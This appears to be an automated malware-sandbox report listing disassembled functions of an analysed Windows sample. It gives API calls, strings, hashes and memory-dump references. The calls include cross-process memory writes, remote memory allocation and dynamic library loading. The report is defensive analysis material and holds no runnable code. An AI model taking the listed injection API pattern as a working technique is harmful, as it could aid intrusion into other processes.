                                            • Instruction ID: ef4e7ea6be9a13b01a9a07278c4bde39b96ac9bc2dc20a2ab3f255578d6f806f
                                            • Opcode Fuzzy Hash: 0551c978e5d646811b90daed92da81d3c6d14d2f9c811a1cea8c03b5dcc6fd11
                                            • Instruction Fuzzy Hash: 72A1FAB1104205AFD700EF68CC91DABB7ACFF98714F004A5DF555D7192EB70AA49CB92
                                            Function 0084E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                            • CoInitialize.OLE32(00000000), ref: 0084E85D
                                            • CoCreateInstance.OLE32(0088DA7C,00000000,00000001,0088D8EC,?), ref: 0084E876
                                            • CoUninitialize.OLE32 ref: 0084E893
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                            • String ID: .lnk
                                            • API String ID: 2126378814-24824748
                                            • Opcode ID: e4989f48bf7873d6d11123351fe1215851eeefcab11427e575f82b720e762553
                                            • Instruction ID: d984620b75251a8ed14876bf078fbfa4dad50bdfc536a9de65a27b6fa871dbde
                                            • Opcode Fuzzy Hash: e4989f48bf7873d6d11123351fe1215851eeefcab11427e575f82b720e762553
                                            • Instruction Fuzzy Hash: D8A134756043059FCB54EF18C88496ABBE5FF88314F148958F99ADB3A2CB31EC45CB92
                                            Function 0082325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 008232ED
                                              • Part of subcall function 0082E0D0: __87except.LIBCMT ref: 0082E10B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 428ade87bdc0558a12e754cdd61477a01528e4f738048e42a73b7a222b5554c5
                                            • Instruction ID: 72e5f80d968188cb5ec9b9b1b3ded179e498c5ec3cde2dc3e1348f176ea471e0
                                            • Opcode Fuzzy Hash: 428ade87bdc0558a12e754cdd61477a01528e4f738048e42a73b7a222b5554c5
                                            • Instruction Fuzzy Hash: F6518C31A08225D6CB15B718F95537A3B98FB40711F248D29F4C6C22E9DF3C8ED89A4B
                                            Function 00844606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0089DC50,?,0000000F,0000000C,00000016,0089DC50,?), ref: 00844645
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 008446C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper$__itow__swprintf
                                            • String ID: REMOVE$THIS
                                            • API String ID: 3797816924-776492005
                                            • Opcode ID: 828d6fa840da2e7a9d0dc8a2a6102ad39e443001a5a918e5f5fcfcae3637fc3a
                                            • Instruction ID: fc96b87fed5295aa3376059f2dc8fc37a857414c525402bfc9e3c3075a5492c0
                                            • Opcode Fuzzy Hash: 828d6fa840da2e7a9d0dc8a2a6102ad39e443001a5a918e5f5fcfcae3637fc3a
                                            • Instruction Fuzzy Hash: 8A417F74A0020D9FCF00DFA8C881AADB7B5FF49314F149059E956EB3A2DB309D46CB51
                                            Function 0083C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0084430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC08,?,?,00000034,00000800,?,00000034), ref: 00844335
                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0083C1D3
                                              • Part of subcall function 008442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0083BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00844300
                                              • Part of subcall function 0084422F: GetWindowThreadProcessId.USER32(?,?), ref: 0084425A
                                              • Part of subcall function 0084422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0084426A
                                              • Part of subcall function 0084422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0083BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00844280
                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083C240
                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083C28D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                            • String ID: @
                                            • API String ID: 4150878124-2766056989
                                            • Opcode ID: 07afa3e7729b701ee4451f141e40924c569db08b58b84cb342fb9f782c2d6c0b
                                            • Instruction ID: 4419da17137db8689d60fd69962642c76d11e01709bd757b761b77ad8c97248e
                                            • Opcode Fuzzy Hash: 07afa3e7729b701ee4451f141e40924c569db08b58b84cb342fb9f782c2d6c0b
                                            • Instruction Fuzzy Hash: 5C41187290021CAEDB11DFA8CD81EEEB7B8FB59700F004195FA55B7181DAB16E45CBA1
                                            Function 0086A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0089DC00,00000000,?,?,?,?), ref: 0086A6D8
                                            • GetWindowLongW.USER32 ref: 0086A6F5
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0086A705
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Long
                                            • String ID: SysTreeView32
                                            • API String ID: 847901565-1698111956
                                            • Opcode ID: f8ef20613472f6421cbd8a5fa80f4d521a260942fa6193a1f1fddf2b0f3f9259
                                            • Instruction ID: 35b2caa7963ca52f3f38dcff4cc46d4ee77995fc830b225f2e773c5898d634f1
                                            • Opcode Fuzzy Hash: f8ef20613472f6421cbd8a5fa80f4d521a260942fa6193a1f1fddf2b0f3f9259
                                            • Instruction Fuzzy Hash: 7C31AD3120020AABDB258E78CC45FEA7BA9FF59324F254719F8B5E22E1D730E8508B51
                                            Function 0086A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0086A15E
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0086A172
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0086A196
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: SysMonthCal32
                                            • API String ID: 2326795674-1439706946
                                            • Opcode ID: 51423e54a6fbd7145d8567bed7676f5b65c900af6d4c57f6e9ea211d6f5e4e48
                                            • Instruction ID: c6f3bf0bd285cb14938b466e145a61d3ca49be59908900b65197c2d60f7088d9
                                            • Opcode Fuzzy Hash: 51423e54a6fbd7145d8567bed7676f5b65c900af6d4c57f6e9ea211d6f5e4e48
                                            • Instruction Fuzzy Hash: DC218D32510218ABDF158F94CC82FEA3B79FF49714F110214FA56BB1D0D6B5A8518B90
                                            Function 0086A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0086A941
                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0086A94F
                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0086A956
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$DestroyWindow
                                            • String ID: msctls_updown32
                                            • API String ID: 4014797782-2298589950
                                            • Opcode ID: f26538d270a8c97b86d168495088f311ef4521bef1a8415a9b8e437a27041c21
                                            • Instruction ID: 5e6a719de1a6d2517d07287879dce39366484f4ef17021193268a8bf6e38ac54
                                            • Opcode Fuzzy Hash: f26538d270a8c97b86d168495088f311ef4521bef1a8415a9b8e437a27041c21
                                            • Instruction Fuzzy Hash: 97219FB5200209AFDB15DF58CC81D6737ADFF5A364B150059FA14EB3A2DB31EC118B61
                                            Function 008699A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00869A30
                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00869A40
                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00869A65
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$MoveWindow
                                            • String ID: Listbox
                                            • API String ID: 3315199576-2633736733
                                            • Opcode ID: f852441cb1eb74b0fb39c379e334381d5b386a9330b5839520b0e8c04d3f507f
                                            • Instruction ID: 53efc5d18821730786d3fb8207dd89cf9dde1986eea71806c3990a78785c1d6c
                                            • Opcode Fuzzy Hash: f852441cb1eb74b0fb39c379e334381d5b386a9330b5839520b0e8c04d3f507f
                                            • Instruction Fuzzy Hash: 53217172610118BFDF118F54DC85EBB3BAEFF89764F128129F9949B1D0C6719C5187A0
                                            Function 0086A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0086A46D
                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0086A482
                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0086A48F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: msctls_trackbar32
                                            • API String ID: 3850602802-1010561917
                                            • Opcode ID: 9258fed068d0ab282e1ef63728fe8495b098ed5fddafde65cf4df3facd90e7a9
                                            • Instruction ID: bb03f707d8b6a0b98b452d64bc81323ea6f19a247ac636afecf233ab94ef4440
                                            • Opcode Fuzzy Hash: 9258fed068d0ab282e1ef63728fe8495b098ed5fddafde65cf4df3facd90e7a9
                                            • Instruction Fuzzy Hash: D211C471200208BAEF245F64CC49FAB3769FF89754F024118FA45E6191D6B2E811CB24
                                            Function 00822287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00822350,?), ref: 008222A1
                                            • GetProcAddress.KERNEL32(00000000), ref: 008222A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RoInitialize$combase.dll
                                            • API String ID: 2574300362-340411864
                                            • Opcode ID: f9f1c21b9a32cf53405279bfcc46f5bffac4b47bfda3e6f48fe66ed58e8e9034
                                            • Instruction ID: 75e06b112db030548bd8555e0f30f567698a8316622876c4f4c54ebbefd75171
                                            • Opcode Fuzzy Hash: f9f1c21b9a32cf53405279bfcc46f5bffac4b47bfda3e6f48fe66ed58e8e9034
                                            • Instruction Fuzzy Hash: 7CE01270A90310EBDB206F74EC8EF18BB64FB00B42F104021B102E61F0CBB99481CF04
                                            Function 0082235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00822276), ref: 00822376
                                            • GetProcAddress.KERNEL32(00000000), ref: 0082237D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RoUninitialize$combase.dll
                                            • API String ID: 2574300362-2819208100
                                            • Opcode ID: 1fe85138a48c951ec389831b702a14ad1f7b39db763f9104ed5973e00094ee0d
                                            • Instruction ID: c79136531deec438beb4ca75727dbece2af7c93072ff422770eb7b1aa7ad2da6
                                            • Opcode Fuzzy Hash: 1fe85138a48c951ec389831b702a14ad1f7b39db763f9104ed5973e00094ee0d
                                            • Instruction Fuzzy Hash: 6CE09970684304EFDA24AFA1AD4DF047BB4BB00B42F140425F109EA2F0CBB8A8408F14
                                            Function 0087AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LocalTime__swprintf
                                            • String ID: %.3d$WIN_XPe
                                            • API String ID: 2070861257-2409531811
                                            • Opcode ID: 91390196bfc79ae57d4b98648a4c61c2215f40765c31a7dc05cf37a4d1525a02
                                            • Instruction ID: 4aff4a28cc49dd96d98880d68abe291784a14fd95ccd74c7ed3816cb4630db0a
                                            • Opcode Fuzzy Hash: 91390196bfc79ae57d4b98648a4c61c2215f40765c31a7dc05cf37a4d1525a02
                                            • Instruction Fuzzy Hash: 88E0EC7180462CABCA5A97509D45DFD73BCFBC4745F104092B90AE1108D635DB84AB13
                                            Function 008042F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008042EC,?,008042AA,?), ref: 00804304
                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804316
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-1355242751
                                            • Opcode ID: 236ce3414766907e643b4c5987992a55883da10465271170586a5ce2bf57ac89
                                            • Instruction ID: 5f93758d4920518fb5ef7daf67cd4a9e10b56dcc1e37feaea7628b56a6f7cf0e
                                            • Opcode Fuzzy Hash: 236ce3414766907e643b4c5987992a55883da10465271170586a5ce2bf57ac89
                                            • Instruction Fuzzy Hash: BED0A774440712AFC7205F25EC0CA45B7D4FF04701B019419E552D23F0D7B4C8808710
                                            Function 00862205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,008621FB,?,008623EF), ref: 00862213
                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00862225
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetProcessId$kernel32.dll
                                            • API String ID: 2574300362-399901964
                                            • Opcode ID: c70d41c01ab4743fbc16eb28ac5bf99b4bfcdf4a1ea09f53f0f7cbbe2938c4fc
                                            • Instruction ID: aa07b6457d30261acb7178ab908e9b3d57d589fa7063a12ee546b5c3a393e3af
                                            • Opcode Fuzzy Hash: c70d41c01ab4743fbc16eb28ac5bf99b4bfcdf4a1ea09f53f0f7cbbe2938c4fc
                                            • Instruction Fuzzy Hash: F3D0A738400B129FC7315F35F80D642F7D4FF04700B018459E862E2390D774D8808760
                                            Function 0080434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,008041BB,00804341,?,0080422F,?,008041BB,?,?,?,?,008039FE,?,00000001), ref: 00804359
                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0080436B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                            • API String ID: 2574300362-3689287502
                                            • Opcode ID: 5768a7620851f3022c7e2b7899add6bb7de4b750ace7db03d728662e12caba45
                                            • Instruction ID: fd37268da90b93284f8e9bd22d0a16e6429341949c7c11b9161ed3132de41fd2
                                            • Opcode Fuzzy Hash: 5768a7620851f3022c7e2b7899add6bb7de4b750ace7db03d728662e12caba45
                                            • Instruction Fuzzy Hash: AFD0A774540713AFC7305F35EC0CA41B7D4FF10719B119419E491D23D0D7B4D8808710
                                            Function 00840539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0084051D,?,008405FE), ref: 00840547
                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00840559
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                            • API String ID: 2574300362-1071820185
